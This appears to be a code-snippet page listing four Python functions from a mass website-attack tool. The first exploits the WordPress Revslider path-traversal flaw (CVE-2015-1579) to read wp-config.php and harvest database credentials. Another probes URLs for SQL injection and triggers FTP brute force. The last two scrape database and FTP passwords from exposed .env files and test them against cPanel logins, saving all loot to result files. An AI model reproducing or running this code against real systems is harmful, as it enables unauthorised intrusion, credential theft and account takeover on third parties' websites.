Esempio n. 1
0
def Exploit(site):
    try:
        Exp = 'http://' + site + \
              '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
        GetConfig = requests.get(Exp, timeout=10, headers=Headers)
        if 'DB_PASSWORD' in str(GetConfig.content):
            Attack(site)
            with open('result/Config_results.txt', 'a') as ww:
                ww.write('Full Config Path  : ' + Exp + '\n')
            try:
                #define('DB_USER', 'admin_soljica2');
                Gethost = re.findall("'DB_HOST', '(.*)'", str(GetConfig.content))
                Getuser = re.findall("'DB_USER', '(.*)'", str(GetConfig.content))
                Getpass = re.findall("'DB_PASSWORD', '(.*)'", str(GetConfig.content))
                Getdb = re.findall("'DB_NAME', '(.*)'", str(GetConfig.content))
                cpanel.Check(site, Getuser[0], Getpass[0])

                with open('result/Config_results.txt', 'a') as ww:
                    ww.write(' Host:  ' + Gethost[0] + '\n' + ' user:  '******'\n' + ' pass:  '******'\n' + ' DB:    ' + Getdb[
                                 0] + '\n---------------------\n')
                return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
            except:
                return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
        else:
            return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
    except:
        return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
Esempio n. 2
0
def CheckSqli(MaybeSqli, site):
    for url in MaybeSqli:
        try:
            error = [
                "DB Error", "SQL syntax;", "mysql_fetch_assoc",
                "mysql_fetch_array", "mysql_num_rows", "is_writable",
                "mysql_result", "pg_exec", "mysql_result", "mysql_num_rows",
                "mysql_query", "pg_query", "System Error", "io_error",
                "privilege_not_granted", "getimagesize", "preg_match",
                "mysqli_result", 'mysqli'
            ]

            if url.startswith("http://"):
                url = url.replace("http://", "")
            elif url.startswith("https://"):
                url = url.replace("https://", "")
            else:
                pass
            agent = {
                'User-Agent':
                'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
            }
            for s in error:
                Checksqli = requests.get('http://' + url + "'",
                                         timeout=5,
                                         headers=agent)
                if s in str(Checksqli.content):
                    SQLI = url.replace("'", "")
                    if SQLI.startswith("http://"):
                        SQLI = SQLI.replace("http://", "")
                    elif SQLI.startswith("https://"):
                        SQLI = SQLI.replace("https://", "")
                    else:
                        pass
                    if 'http://' in SQLI:
                        pass
                    else:
                        with open('result/SqlInjection_targets.txt',
                                  'a') as xx:
                            xx.write('http://' + SQLI + '\n')
                        try:
                            Username = re.findall('/home/(.*)/public_html/',
                                                  str(Checksqli.content))[0]
                            cpanel.Check(site, Username, 'Cpanel')
                            FTPBruteForce.CheckFTPport(site, Username)
                        except:
                            pass
                    return printModule.returnYes(SQLI, 'N/A', 'Sql Injection',
                                                 'unknown')
                else:
                    pass
            break
        except:
            pass
Esempio n. 3
0
def GETDATABase(REZ, site):
    try:
        if 'DB_CONNECTION' in REZ:
            if 'DB_CONNECTION=null' in REZ:
                pass
            else:
                for i in range(20):
                    Host = re.findall('DB_HOST=(.*)', REZ)[i]
                    database = re.findall('DB_DATABASE=(.*)', REZ)[i]
                    user = re.findall('DB_USERNAME=(.*)', REZ)[i]
                    Pass = re.findall('DB_PASSWORD=(.*)', REZ)[i]
                    with open('result/Config_results.txt', 'a') as ww:
                        ww.write(' TargetDB = {}/.env\n Host:  '.format(site) + Host + '\n' + ' user:  '******'\n' + ' pass:  '******'\n' + ' DB:    ' + database
                                      + '\n---------------------\n'.format(site))
                    cpanel.Check(site, user, Pass)

    except:
        pass
Esempio n. 4
0
def GETFTp(REZ, site):
    try:
        if 'FTP_HOST=' in REZ:
            if 'FTP_HOST=null' in REZ:
                pass
            else:
                for i in range(20):
                    Host = re.findall('FTP_HOST=(.*)', REZ)[i]
                    User = re.findall('FTP_USERNAME=(.*)', REZ)[i]
                    Pass = re.findall('FTP_PASSWORD=(.*)', REZ)[i]
                    with open('result/FTP_Results.txt', 'a') as writer:
                        writer.write(
                            'HostName: {}'.format(Host) + '\nuser: {}'.format(User) +
                            '\nPass: {}'.format(Pass) +
                            '\n-----------------------------------------\n')
                    cpanel.Check(site, User, Pass)
        else:
            pass
    except:
        pass